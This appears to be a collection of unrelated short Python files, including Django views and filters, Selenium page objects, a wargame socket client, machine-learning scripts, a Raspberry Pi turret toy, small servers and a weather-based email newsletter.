from .depth_model import DepthNet
from .depth_net_res_net import DepthNetResNet
from .pose_model import PoseNet, PoseNetResNet
from .scaled_unsupervised_depth_model import ScaledUnsupervisedDepthModel
from .depth_evaluation_model import DepthEvaluationModel
from .multi_unsupervised_depth_model import MultiUnsupervisedDepthModel
|
import django_filters
from django.core.exceptions import ValidationError
from django.db.models import Q
from django.utils.timezone import now
from elections.models import Election
from organisations.models import OrganisationGeography
class ElectionFilter(django_filters.FilterSet):
def election_intersects_local_authority_filter(self, queryset, name, value):
og_qs = OrganisationGeography.objects.filter(
organisation__official_identifier=value,
organisation__organisation_type="local-authority",
).select_related("organisation")
if not og_qs.exists():
raise ValidationError(
"""Only local authorities supported""",
code="invalid",
)
if self.data.get("future", False):
og_qs = og_qs.filter(
Q(end_date__gt=now()) | Q(end_date=None)
).filter(Q(start_date__lt=now()) | Q(start_date=None))
if "poll_open_date" in self.data and self.data["poll_open_date"]:
og_qs = og_qs.filter(
Q(start_date__lte=self.data["poll_open_date"])
| Q(start_date=None)
)
if (
"organisation_start_date" in self.data
and self.data["organisation_start_date"]
):
og_qs = og_qs.filter(
Q(start_date__lte=self.data["organisation_start_date"])
| Q(start_date=None)
)
try:
og_qs.get()
except OrganisationGeography.MultipleObjectsReturned:
raise ValidationError(
"""Organisation has more than one geography,
please specify a `poll_open_date` or organisation_start_date""",
code="invalid",
)
except OrganisationGeography.DoesNotExist:
return og_qs
return queryset.filter(
Q(division_geography__geography__bboverlaps=og_qs.get().geography)
| Q(
organisation_geography__geography__bboverlaps=og_qs.get().geography
)
).prefetch_related("_children_qs")
organisation_identifier = django_filters.CharFilter(
field_name="organisation__official_identifier",
lookup_expr="exact",
)
organisation_type = django_filters.CharFilter(
field_name="organisation__organisation_type",
lookup_expr="exact",
)
election_intersects_local_authority = django_filters.CharFilter(
label="Election intersects local authority",
method="election_intersects_local_authority_filter",
)
organisation_start_date = django_filters.DateFilter(
field_name="organisation__start_date",
lookup_expr="exact",
)
election_id_regex = django_filters.CharFilter(
label="Filter elections by their election id using a regular expression",
field_name="election_id",
lookup_expr="regex",
max_length="20",
)
exclude_election_id_regex = django_filters.CharFilter(
label="Exclude elections by their election id using a regular expression",
field_name="election_id",
lookup_expr="regex",
exclude=True,
max_length="20",
)
modified = django_filters.IsoDateTimeFilter(
field_name="modified",
lookup_expr="gt",
help_text="An ISO datetime",
)
class Meta:
model = Election
fields = {
"group_type": ["exact"],
"poll_open_date": ["exact", "gte", "lte"],
}
|
import re
s="adfkasdjklfjdslf???"
s = re.sub(r"([.!?])", r" \1", s)
s = re.sub(r"[^a-zA-Z.!?]+", r" ", s)
print(s)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 8/2/2017 5:03 PM
# @Author : Winnichen
# @File : LoginPage.py
from pages.BasePage import BasePage
from selenium.webdriver.common.by import By
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import logging
import os,time
class LoginPage(BasePage):
username1_loc=(By.ID,"cred_userid_inputtext")
login_loc=(By.ID,"cred_sign_in_button")
password_loc=(By.ID,"passwordInput")
submit_loc=(By.ID,"submitButton")
checkpoint_loc=(By.CSS_SELECTOR,"#header-bar > div.heard-btn > div > a")
logout_loc=(By.CSS_SELECTOR,"#header-bar > div.heard-btn > div > ul > li > a")
checkpoint_logout_loc=(By.ID,"login_workload_logo_text")
def input_username(self,username):
#self.find_element(*self.username1_loc).send_keys(username)
self.send_keys(self.username1_loc,username)
def click_login(self):
time.sleep(1)
self.find_element(*self.login_loc).click()
def input_password(self,password):
#self.find_element(*self.password_loc).send_keys(password)
self.send_keys(self.password_loc,password)
def click_submit(self):
time.sleep(1)
self.find_element(*self.submit_loc).click()
def get_username(self):
return self.find_element(*self.checkpoint_loc).text
def click_username(self):
time.sleep(1)
self.find_element(*self.checkpoint_loc).click()
def click_logout(self):
time.sleep(1)
self.find_element(*self.logout_loc).click()
|
#!/usr/bin/python3
import socket
import struct
s = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
try:
host = socket.gethostbyname('vortex.labs.overthewire.org')
port = 5842
s.connect( (host, port) )
in1 = s.recv(4)
in2 = s.recv(4)
in3 = s.recv(4)
in4 = s.recv(4)
int1 = struct.unpack('<L', in1)[0]
int2 = struct.unpack('<L', in2)[0]
int3 = struct.unpack('<L', in3)[0]
int4 = struct.unpack('<L', in4)[0]
s.send( struct.pack('<L', int1+int2+int3+int4) )
print( str(s.recv(1024).decode()) )
except:
print("kaboom")
|
import numpy as np
import matplotlib.pyplot as plt
import layer
import activation
import loss
import metric
import data
'''
nn_basics
--basic_neuron.py
--logical_operations.py
import nn_basics.basic_neuron as bn
import nn_basics.logical_operations as lo
network = bn.Neuron()
network.add_x(1, 1)
network.add_weights(-2, 5)
network.summator()
network.step_func()
print(f'Step function: {network.y}')
network.sigmoid_func()
print(f'Sigmoid function: {network.y}')
operation = lo.LogicalOperations()
print(f'NOT: {operation.not_func(1)}')
print(f'AND: {operation.and_func(1, 1)}')
print(f'OR: {operation.or_func(0, 0)}')
print(f'XOR: {operation.xor_func(0, 1)}')
'''
''' layer.py activation.py '''
# INPUT
X, y = data.data_spiral()
y_onehot = data.one_hot(y)
'''
print(f"X: {X}")
print(f"y: {y}")
print(f"y_onehot: {y_onehot}")
'''
# Model Architecture
layer1 = layer.Layer_Dense(2, 4)
activation1 = activation.Activation_LeakyReLU()
layer2 = layer.Layer_Dense(4, 3)
activation2 = activation.Activation_Softmax()
loss1 = loss.Loss_CategoricalCrossEntropy()
metric1 = metric.Metric_Accuracy()
# Model Evaluation
layer1.forward(X) # FC layer
weights1 = layer1.weights
activation1.forward(layer1.output) # Non-linear fun
layer2.forward(activation1.output) # FC layer
activation2.forward(layer2.output) # Non-linear fun
loss1.forward(activation2.output, y_onehot) # Loss fun
# print(f"Output: {activation2.output}") # Results
print(f"Loss: {np.mean(loss1.output)}") # Loss
print(f"Accuracy: {metric1.calculate(activation2.output, y)}") # Metrics
# Model Backpropogation
loss1.backward()
activation2.backward(loss1.grad)
layer2.backward(activation2.grad)
layer2.update()
activation1.backward(layer2.grad)
layer1.backward(activation1.grad)
layer1.update()
# Model Evaluation
layer1.forward(X) # FC layer
activation1.forward(layer1.output) # Non-linear fun
layer2.forward(activation1.output) # FC layer
activation2.forward(layer2.output) # Non-linear fun
loss1.forward(activation2.output, y_onehot) # Loss fun
# print(f"Output: {activation2.output}") # Results
print(f"Loss: {np.mean(loss1.output)}") # Loss
print(f"Accuracy: {metric1.calculate(activation2.output, y)}") # Metrics
|
#!/usr/bin/python
import RPi.GPIO as GPIO
import time
from pygame import mixer
import random
import sys
import select
import math
#Constants
SOUND_FOLDER= "./sounds/"
LANGUAGE = "en"
EXT = ".wav"
#More sounds here http://theportalwiki.com/wiki/Turret_voice_lines#Turret_fire
SOUNDS_DETECTED = ["i_see_you","here_you_are","who_s_there","target_adquired", "firing", "gotcha"]
SOUNDS_MISS = ["are_you_still_there", "target_lost","searching"]
SOUNDS_SEARCH = ["searching", "hello","is_anyone_there", "sentry_mode_activated", "coud_you_come_here"]
SOUNDS_DIE = ["i_dont_blame_you", "i_dont_hate_you", "auauauau", "self_test_error", "resting", "hybernating", "sleep_mode_activated","shutting_down", "no_hard_feelings", "malfunctioning", "critical_error"]
SOUNDS_MOVE = ["stop_shooting", "put_me_down", "wow", "eyeyey", "who_are_you", "please_put_me_down"]
SOUND_FIRE = SOUND_FOLDER+"fire"+EXT
SOUND_PING = SOUND_FOLDER+"ping"+EXT
SOUND_DIE = SOUND_FOLDER+"die"+EXT
SOUND_DEPLOY = SOUND_FOLDER+"deploy"+EXT
SOUND_RETRACT = SOUND_FOLDER+"retract"+EXT
TIME_LOOP = 1 #Time between loops
TIME_ACTIVE = 5 #Time to wait after activation
TIME_DETECTION = 30 #If last detection is greater than this, the target is missing
NOT_DETECTED = 0
DETECTED = 1
#GPIO PINS
PIN_LED = 12
PIN_PIR = 7
PIN_VIBRATOR = 11
#GPIO setup
GPIO.setmode(GPIO.BOARD)
GPIO.setup(PIN_VIBRATOR, GPIO.OUT)
GPIO.setup(PIN_LED, GPIO.OUT)
GPIO.setup(PIN_PIR, GPIO.IN, pull_up_down = GPIO.PUD_DOWN)
#Vars
deployed = False
status = NOT_DETECTED
lastDetectionTime = 0
#Functions
def chance(prob):
return random.randint(0,100) < prob
def isDetected():
return (time.time() - lastDetectionTime) < TIME_DETECTION
def motion(PIN_PIR):
global lastDetectionTime
print "Motion detected! "
lastDetectionTime = time.time()
def randomSound(sounds):
sound = random.choice(sounds)
return SOUND_FOLDER + LANGUAGE + "/" + sound + EXT
def speak (sounds) :
sound = randomSound(sounds)
mixer.music.load(sound)
mixer.music.play()
waitMixerFinish()
def waitMixerFinish():
while mixer.music.get_busy():
time.sleep(1)
def shoot():
if (not deployed):
deploy()
mixer.music.load(SOUND_FIRE)
mixer.music.play()
GPIO.output(PIN_VIBRATOR, True)
waitMixerFinish()
GPIO.output(PIN_VIBRATOR, False)
def ping():
mixer.music.load(SOUND_PING)
for i in range(5):
mixer.music.play()
time.sleep(1)
def fadeDown():
GPIO.output(PIN_LED, True)
pwm(PIN_LED,100,-1, 2)
GPIO.output(PIN_LED, False)
def fadeUp():
GPIO.output(PIN_LED, True)
pwm(PIN_LED,0,1, 2)
def pwm (pin, start, increment, totalTime):
p = GPIO.PWM(PIN_LED, 50)
p.start(0)
count = start + increment
sleep = float(totalTime) / (100 / math.fabs(increment))
while (count < 100 and count > 0) :
p.ChangeDutyCycle(count)
time.sleep(sleep)
count += increment
def blink():
r = random.uniform(0.01,0.2)
GPIO.output(PIN_LED, False)
time.sleep(r)
GPIO.output(PIN_LED, True)
time.sleep(r)
def die():
GPIO.output(PIN_LED, True)
speak(SOUNDS_DIE)
shoot()
mixer.music.load(SOUND_DIE)
mixer.music.play()
for i in range(5):
blink()
fadeDown()
def pickedUp():
speak(SOUNDS_MOVE)
def deploy():
mixer.music.load(SOUND_DEPLOY)
mixer.music.play()
def retract():
mixer.music.load(SOUND_RETRACT)
mixer.music.play()
def readInput():
input = ""
i,o,e = select.select([sys.stdin],[],[],0.0001)
for s in i:
if s == sys.stdin:
input = sys.stdin.readline().strip()
if (input == ""):
pass
elif (input == "enable"):
lastDetectionTime = time.time()
elif (input == "disable"):
lastDetectionTime = 0
elif (input == "shoot"):
shoot()
elif (input == "pick"):
pickedUp()
elif (input == "die"):
die()
else:
print "Unrecognised command "+input
#init
mixer.init()
GPIO.add_event_detect(PIN_PIR, GPIO.RISING, callback = motion)
print "Start torret loop, press [CTRL + C] to exit"
#Loop
try:
while True:
readInput()
if (status == NOT_DETECTED and isDetected() ):
print "Target adquired"
status = DETECTED
GPIO.output(PIN_LED, True)
speak(SOUNDS_DETECTED)
shoot() #Play fire sound and vibration
ping()
elif (status == DETECTED and isDetected() ):
#print "Still detected"
#shoot() #Play fire sound and vibration
pass
elif (status == DETECTED and not isDetected() ):
print "Target lost"
status = NOT_DETECTED
GPIO.output(PIN_LED, False)
retract()
speak(SOUNDS_MISS)
#if (status == NOT_DETECTED and not isDetected() ):
# print "Still not detected"
time.sleep(TIME_LOOP)
except KeyboardInterrupt:
print "Quit"
# Reset GPIO settings
GPIO.output(PIN_LED, False)
GPIO.cleanup()
|
a = 100
b = 200
c = a + b
print (c)
|
from pyasn1.type.namedtype import NamedType, NamedTypes, OptionalNamedType, DefaultedNamedType
from pyasn1.type.namedval import NamedValues
from asn1PERser.classes.data.builtin import *
from asn1PERser.classes.types.type import AdditiveNamedTypes
from asn1PERser.classes.types.constraint import MIN, MAX, NoConstraint, ExtensionMarker, SequenceOfValueSize, \
ValueRange, SingleValue, ValueSize, ConstraintOr, ConstraintAnd
class MyEnum(EnumeratedType):
enumerationRoot = NamedValues(
('one', 0),
('two', 1),
)
namedValues = enumerationRoot
class MySeq(SequenceType):
class i0(IntegerType):
subtypeSpec = ValueRange(10, 20)
rootComponent = AdditiveNamedTypes(
NamedType('i0', i0()),
NamedType('i1', IntegerType()),
)
componentType = rootComponent
class Data1(SequenceType):
class d1(BitStringType):
subtypeSpec = ValueSize(1, 20, extensionMarker=True)
subtypeSpec = ExtensionMarker(True)
rootComponent = AdditiveNamedTypes(
NamedType('d0', OctetStringType()),
)
extensionAdditionGroups = [
AdditiveNamedTypes(
NamedType('d1', d1()),
NamedType('d2', MySeq()),
),
]
componentType = rootComponent + extensionAdditionGroups
class Data2(ChoiceType):
class c0(IntegerType):
subtypeSpec = ValueRange(1, MAX)
class c3(OctetStringType):
subtypeSpec = ValueSize(5, 10)
subtypeSpec = ExtensionMarker(True)
rootComponent = AdditiveNamedTypes(
NamedType('c0', c0()),
)
extensionAdditionGroups = [
AdditiveNamedTypes(
NamedType('c1', MyEnum()),
NamedType('c2', BooleanType()),
),
AdditiveNamedTypes(
NamedType('c3', c3()),
NamedType('c4', MySeq()),
),
]
componentType = rootComponent + extensionAdditionGroups
class Data3(SequenceType):
class s3(IntegerType):
subtypeSpec = ValueRange(-10, 100)
subtypeSpec = ExtensionMarker(True)
rootComponent = AdditiveNamedTypes(
NamedType('s0', IntegerType()),
)
extensionAddition = AdditiveNamedTypes(
NamedType('s4', IntegerType()),
NamedType('s5', IntegerType()),
)
extensionAdditionGroups = [
AdditiveNamedTypes(
NamedType('s1', MySeq()),
OptionalNamedType('s2', IntegerType()),
),
AdditiveNamedTypes(
NamedType('s3', s3()),
NamedType('s6', MyEnum()),
),
]
componentType = rootComponent + extensionAddition + extensionAdditionGroups
|
from keras.utils import to_categorical
from keras.models import load_model
from sklearn.model_selection import StratifiedKFold
import numpy as np
import pandas as pd
import spectral
import cv2
import matplotlib.pyplot as plt
from sklearn.metrics import precision_recall_fscore_support, accuracy_score, cohen_kappa_score, confusion_matrix
from utils import load_data, AA_andEachClassAccuracy, load_HSISAT, Patch, applyPCA, padWithZeros
import keras.backend as k
import tensorflow as tf
k.set_image_data_format('channels_last')
# import os
# os.environ['CUDA_VISIBLE_DEVICES'] = '-1' # Uncomment to use CPU instead o GPU
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
LOAD DATASET
""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
# Select dataset. Options are 'Kochia', 'IP', 'PU', 'SA', or 'EUROSAT'
dataset = 'IP'
train_x, train_y = load_data(dataset=dataset, test=True)
if dataset == 'Kochia':
classes = 3
elif dataset == 'EUROSAT':
classes = 10
else:
classes = int(np.max(train_y)) + 1
print("Dataset correctly imported")
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
EVALUATION
""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
windowSize = train_x.shape[1]
kfold = StratifiedKFold(n_splits=10, shuffle=True, random_state=7)
cvoa = []
cvaa = []
cvka = []
cvpre = []
cvrec = []
cvf1 = []
# Select Network. Options are 'hyper3dnet', 'hybridsn', 'spectrum',
# 'resnet50' (expect for Kochia), or 'kochiafc' (only for Kochia)
network = 'hyper3dnet'
# Initialize
confmatrices = np.zeros((10, int(classes), int(classes)))
ntrain = 1
model = None
for train, test in kfold.split(train_x, train_y):
k.clear_session()
ytest = to_categorical(train_y[test], num_classes=classes).astype(np.int32)
# Load network and weights of the 'ntrain'-fold
model = load_model("weights/" + dataset + "/" + network + "/weights-" + network + dataset + str(ntrain) + ".h5")
model.trainable = False
# Predict results
ypred = model.predict(train_x[test])
# Calculate confusion matrix
sess = tf.compat.v1.Session()
with sess.as_default():
con_mat = tf.math.confusion_matrix(labels=np.argmax(ytest, axis=-1),
predictions=np.argmax(ypred, axis=-1)).numpy()
con_mat_norm = np.around(con_mat.astype('float') / con_mat.sum(axis=1)[:, np.newaxis], decimals=3)
classes_list = list(range(0, int(classes)))
con_mat_df = pd.DataFrame(con_mat_norm, index=classes_list, columns=classes_list)
confmatrices[ntrain - 1, :, :] = con_mat_df.values
# Calculate metrics
oa = accuracy_score(np.argmax(ytest, axis=1), np.argmax(ypred, axis=-1))
confusion = confusion_matrix(np.argmax(ytest, axis=1), np.argmax(ypred, axis=-1))
each_acc, aa = AA_andEachClassAccuracy(confusion)
kappa = cohen_kappa_score(np.argmax(ytest, axis=1), np.argmax(ypred, axis=-1))
prec, rec, f1, support = precision_recall_fscore_support(np.argmax(ytest, axis=1), np.argmax(ypred, axis=-1),
average='macro')
# Add metrics to the list
cvoa.append(oa * 100)
cvaa.append(aa * 100)
cvka.append(kappa * 100)
cvpre.append(prec * 100)
cvrec.append(rec * 100)
cvf1.append(f1 * 100)
ntrain = ntrain + 1
# Selects the fold with the minimum performance
nmin = np.argmin(cvoa)
model = load_model("weights/" + dataset + "/" + network + "/weights-" + network + dataset + str(nmin + 1) + ".h5")
model.trainable = False
file_name = "classification_report_hyper3dnet" + dataset + ".txt"
with open(file_name, 'w') as x_file:
x_file.write("Overall accuracy%.3f%% (+/- %.3f%%)" % (float(np.mean(cvoa)), float(np.std(cvoa))))
x_file.write('\n')
x_file.write("Average accuracy%.3f%% (+/- %.3f%%)" % (float(np.mean(cvaa)), float(np.std(cvaa))))
x_file.write('\n')
x_file.write("Kappa accuracy%.3f%% (+/- %.3f%%)" % (float(np.mean(cvka)), float(np.std(cvka))))
x_file.write('\n')
x_file.write("Precision accuracy%.3f%% (+/- %.3f%%)" % (float(np.mean(cvpre)), float(np.std(cvpre))))
x_file.write('\n')
x_file.write("Recall accuracy%.3f%% (+/- %.3f%%)" % (float(np.mean(cvrec)), float(np.std(cvrec))))
x_file.write('\n')
x_file.write("F1 accuracy%.3f%% (+/- %.3f%%)" % (float(np.mean(cvf1)), float(np.std(cvf1))))
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
PLOT
""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
# Segmentation result
if dataset == 'IP' or dataset == 'PU' or dataset == 'SA':
X, y = load_HSISAT(dataset)
height = y.shape[0]
width = y.shape[1]
X, pca = applyPCA(X, numComponents=30)
X = padWithZeros(X, windowSize // 2)
# calculate the predicted image
outputs = np.zeros((height, width))
for i in range(height):
for j in range(width):
target = int(y[i, j])
if target == 0:
continue
else:
image_patch = Patch(X, i, j, windowSize)
print(i, " ", j)
X_test_image = image_patch.reshape(1, image_patch.shape[0], image_patch.shape[1],
image_patch.shape[2]).astype('float32')
prediction = (model.predict(X_test_image))
prediction = np.argmax(prediction, axis=1)
outputs[i][j] = prediction + 1
# Print Ground-truth, network output, and comparison
colors = spectral.spy_colors
colors[1] = [125, 80, 0]
colors[2] = [80, 125, 0]
colors[4] = [255, 0, 0]
colors[10] = [150, 30, 100]
colors[11] = [200, 100, 0]
ground_truth = spectral.imshow(classes=y, figsize=(7, 7), colors=colors)
spectral.save_rgb('weights/' + dataset + network + 'dataset_gt.png', y, colors=colors)
predict_image = spectral.imshow(classes=outputs.astype(int), figsize=(7, 7), colors=colors)
spectral.save_rgb('weights/' + dataset + network + 'dataset_out.png', outputs.astype(int), colors=colors)
outrgb = cv2.imread('weights/' + dataset + network + 'dataset_out.png', cv2.IMREAD_COLOR)
outrgb = cv2.cvtColor(outrgb, cv2.COLOR_BGR2RGB)
for i in range(height):
for j in range(width):
if y[i, j] != outputs.astype(int)[i, j]:
outrgb[i, j] = [255, 255, 0] # Mark the errors in yellow
plt.figure()
plt.imshow(outrgb)
|
import socket
ServerSock=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ServerSock.bind(('localhost',7777))
(ClientMsg, (ClientIP, ClientPort)) = ServerSock.recvfrom(1000)
ServerSock.sendto('xiu', (ClientIP, ClientPort))
print 'Client Message', ClientMsg
ServerSock.close()
|
import asyncio
import primes
from concurrent.futures import ProcessPoolExecutor as Pool
pool = Pool(max_workers=8)
async def primes_server(address):
server = await asyncio.start_server(primes_handler, *address)
addr = server.sockets[0].getsockname()
print(f"start on {addr}")
await server.serve_forever()
async def primes_handler(reader, writer):
while True:
data = await reader.read(100000)
try:
prime_to_test = int(data)
except ValueError:
continue
### CPU code
## threads - still not good
## result = await asyncio.to_thread(primes.primes_up_to, prime_to_test)
## result = primes.primes_up_to(prime_to_test)
loop = asyncio.get_running_loop()
result = await loop.run_in_executor(pool, primes.primes_up_to, prime_to_test)
### CPU end
writer.write(f'result for {prime_to_test} = {result}'.encode("utf-8"))
await writer.drain()
print("conn closed")
await writer.wait_closed()
if __name__ == "__main__":
asyncio.run(primes_server(("", 25000))) |
# -*- coding: utf-8 -*-
'''
Management of artifactory repositories
======================================
:depends: - requests Python module
:configuration: See :py:mod:`salt.modules.artifactory` for setup instructions.
.. code-block:: yaml
local_artifactory_repo:
artifactory_repo.repo_present:
- name: remote_artifactory_repo
- package_type: generic
- repo_type: local
remote_artifactory_repo:
artifactory_repo.repo_present:
- name: remote_artifactory_repo
- repo_type: remote
- url: "http://totheremoterepo:80/"
'''
def __virtual__():
'''
Only load if the artifactory module is in __salt__
'''
return True
def repo_present(name, repo_type, package_type, url=None, **kwargs):
'''
Ensures that the artifactory repo exists
:param name: new repo name
:param description: short repo description
'''
ret = {'name': name,
'changes': {},
'result': True,
'comment': 'Repository "{0}" already exists'.format(name)}
# Check if repo is already present
repo = __salt__['artifactory_repo.repo_get'](name=name, **kwargs)
if 'Error' not in repo:
#update repo
pass
else:
# Create repo
__salt__['artifactory_repo.repo_create'](name, repo_type, package_type, url, **kwargs)
ret['comment'] = 'Repository "{0}" has been added'.format(name)
ret['changes']['repo'] = 'Created'
return ret
|
"""
Created on Sun Nov 22 17:26:01 2015
Script will do sentiment analysis on restaurant reviews.
@author: Ricky
"""
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.ensemble import VotingClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.neighbors import KNeighborsClassifier
from sklearn.naive_bayes import MultinomialNB
from sklearn.pipeline import Pipeline
from nltk.util import ngrams
import re
from sklearn import linear_model
fileWriter = open('out.txt','w')
mystopwords = ['i', 'me', 'my', 'myself', 'we', 'our', 'ours', 'ourselves', 'you', 'your', 'yours',
'yourself', 'yourselves', 'he', 'him', 'his', 'himself', 'she', 'her', 'hers',
'herself', 'it', 'its', 'itself', 'they', 'them', 'their', 'theirs', 'themselves',
'what', 'which', 'who', 'whom', 'this', 'that', 'these', 'those', 'am', 'is', 'are',
'was', 'were', 'be', 'been', 'being', 'have', 'has', 'had', 'having', 'do', 'does',
'did', 'doing', 'a', 'an', 'the', 'and', 'but', 'if', 'or', 'because', 'as', 'until',
'while', 'of', 'at', 'by', 'for', 'with', 'about', 'against', 'between', 'into',
'through', 'during', 'before', 'after', 'above', 'below', 'to', 'from', 'up', 'down',
'in', 'out', 'on', 'off', 'over', 'under', 'again', 'further', 'then', 'once', 'here',
'there', 'when', 'where', 'why', 'how', 'all', 'any', 'both', 'each', 'few', 'more',
'most', 'other', 'some', 'such', 'no', 'nor', 'not', 'only', 'own', 'same', 'so',
'than', 'too', 'very', 's', 't', 'can', 'will', 'just', 'don', 'should', 'now']
def loadData(fname):
reviews=[]
labels=[]
# count2 = 0
f=open(fname)
for line in f:
# count2 = count2 + 1
review,rating=line.strip().split('\t')
review = re.sub('not ', 'not', review)
review = re.sub('Not ', 'Not', review)
review = re.sub('<br>', ' ',review)
review = re.sub(' +', ' ',review)
# review = re.sub('[^a-z\d]', ' ',review)
terms = review.split()
reviews.append(review.lower())
labels.append(int(rating))
threegrams = ngrams(terms,3)
for tg in threegrams:
if tg[0] in mystopwords or tg[1] in mystopwords or tg[2] in mystopwords:
continue
# print count2
f.close()
return reviews,labels
def loadTrainData(fname):
reviews=[]
f=open(fname)
for line in f:
review=line.strip()
review = re.sub('not ', 'not', review)
review = re.sub('Not ', 'Not', review)
review = re.sub('<br>', ' ',review)
review = re.sub(' +', ' ',review)
# review = re.sub('[^a-z\d]', ' ',review)
terms = review.split()
reviews.append(review.lower())
threegrams = ngrams(terms,3)
for tg in threegrams:
if tg[0] in mystopwords or tg[1] in mystopwords or tg[2] in mystopwords:
continue
f.close()
return reviews
rev_train,labels_train=loadData('training.txt')
rev_test=loadTrainData('testing.txt')
MNB_pipeline = Pipeline([('vect', CountVectorizer(ngram_range = (1, 2))),
('clf', MultinomialNB(alpha = 1.0, fit_prior = True)),
])
KNN_pipeline = Pipeline([('vect', CountVectorizer()),
('clf', KNeighborsClassifier(n_neighbors = 20)),
])
SGD_pipeline = Pipeline([('vect', CountVectorizer()),
('clf', linear_model.SGDClassifier(loss='log')),
])
LR_pipeline = Pipeline([('vect', CountVectorizer()),
('tfidf', TfidfTransformer(norm = 'l2', use_idf = True, smooth_idf = True, sublinear_tf = True)),
('clf', LogisticRegression(warm_start = True, random_state = 1)),
])
eclf = VotingClassifier(estimators=[('MNB', MNB_pipeline), ('SGD',SGD_pipeline), ('LR', LR_pipeline)], voting = 'soft', weights = [3,2,3])
#('KNN', KNN_pipeline),
eclf.fit(rev_train,labels_train)
#use soft voting to predict (majority voting)
pred=eclf.predict(rev_test)
for x in pred:
fileWriter.write(str(x)+'\n')
fileWriter.close()
|
from django.shortcuts import render, redirect
import random
VALUES = [
"alpha",
"bravo",
"charlie",
"delta",
"echo",
"foxtrot",
"golf",
"hotel",
"india",
"juliet",
"kilo",
"lima",
"mike",
]
def shuffle_values():
for i in range( len( VALUES ) / 2 ):
j = random.randint( 0, len( VALUES ) - 1 )
VALUES[i], VALUES[j] = VALUES[j], VALUES[i]
def index(request):
return render( request, "surprise_me/index.html" )
def ready(request):
shuffle_values()
nr_items = int( request.POST['nr_items'] )
request.session['surprises'] = VALUES[:nr_items]
return redirect( "/results" )
def results(request):
return render( request, "surprise_me/results.html" )
|
# -*- encoding : utf-8 -*-
import pandas as pd
from utils import emailUtils
def emailFormat(content):
d = ""
print(content)
for i in range(len(content)):
d = d + """
<tr>
<td align="center"><a href="http://10.10.12.47/zentao/bug-view-"""+str(content[i]["id"])+""".html"> """+ str(content[i]["id"]) + """</a></td>
<td width="50%" align="left">""" + str(content[i]["title"]) + """</td>
<td align="center">""" + str(content[i]['severity']) + """</td>
<td align="center">""" + str(content[i]['assignedTo']) + """</td>
<td align="center"> <font color="#FF0000">""" + str(content[i]['outDate']) + """</font> </td>
</tr>
"""
html = """
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<body>
<div id="container">
<p><strong>超期Bug未处理列表如下:</strong></p>
<div id="content">
<table width="90%" border="1" bordercolor="black" cellspacing="0" cellpadding="0">
<tr>
<td align="center"><strong>BugId</strong></td>
<td align="center"><strong>描述</strong></td>
<td align="center"><strong>严重等级</strong></td>
<td align="center"><strong>当前人员</strong></td>
<td align="center" color="red"><strong>超期(天数)</strong></td>
</tr>""" + d + """
</table>
</div>
</div>
</div>
</body>
</html>
"""
emailUtils.emailConf().sendMail(html)
|
def DoWorkInGenerator(num_work_items):
for i in xrange(num_work_items):
print 'G do some work here'
yield i
print 'G do more work here'
for i in DoWorkInGenerator(3):
print i
################################################################################
def DoWorkWithCallback(num_work_items, callback):
for i in xrange(num_work_items):
print 'C do some work here'
callback(i)
print 'C do more work here'
def MyCallback(i):
print i
DoWorkWithCallback(3, MyCallback)
################################################################################
class DoWorkBase(object):
def __init__(self, num_work_items):
for self.i in xrange(num_work_items):
print 'B do some work here'
self.CustomCode()
print 'B do more work here'
def CustomCode(self):
raise NotImplementedError()
class DoCustomWork(DoWorkBase):
def CustomCode(self):
print self.i
DoCustomWork(3)
################################################################################
class DoWorkInObject(object):
def __init__(self, i):
print 'O do some work here'
self.i = i
def MoreWork(self):
print 'O do more work here'
for i in xrange(3):
w = DoWorkInObject(i)
print w.i
w.MoreWork()
|
from django.core.mail import EmailMultiAlternatives
from django.template.loader import get_template
from django.template import Context
from newsletter.weather import get_weather_json
from NotiWeather import settings
NICE_OUT_SUBJECT = "It's nice out! Enjoy a discount on us!"
POOR_OUT_SUBJECT = "Not so nice out? That's okay, enjoy a discount on us!"
REGULAR_SUBJECT = "Enjoy a discount on us!"
def send_email(user):
"""
Function that handles the sending of weather-powered emails to users.
This function takes a User instance, retrieves it's weather JSON from
Wunderground, calculates the output for the email subject and body, then
sends the email.
"""
data = get_weather_json(user)
# Exctract necessary variables from JSON
location = data['current_observation']['display_location']['full']
weather_now = data['current_observation']['weather']
temp_now = float(data['current_observation']['temp_f'])
avg_high = float(data['almanac']['temp_high']['normal']['F'])
icon_url = data['current_observation']['icon_url']
readable_weather = '{} degrees, {}.'.format(temp_now, weather_now.lower())
email = user.email
# Set email's subject based on current conditions
# NOTE: We are using the average high temperature in our comparison...
# -- This could be done a variety of ways including using the median of the
# -- average high and low temperature, or using the average low in the
# -- morning/night and the average high during the day.
subject = REGULAR_SUBJECT
if (temp_now >= avg_high+5) or ('clear' in weather_now.lower()):
subject = NICE_OUT_SUBJECT
if (temp_now <= avg_high-5) or ('rain' in weather_now.lower()):
subject = POOR_OUT_SUBJECT
text = get_template('email/newsletter.txt')
html = get_template('email/newsletter.html')
context = Context(
{
'location': location,
'icon_url': icon_url,
'weather': readable_weather
}
)
html_content = html.render(context)
text_content = text.render(context)
message = EmailMultiAlternatives(
subject,
text_content,
settings.EMAIL_HOST_USER,
[email]
)
message.attach_alternative(html_content, 'text/html')
message.send()
|
#!/Users/john/anaconda/bin/python3
print("Content-Type: text/html") # HTML is following
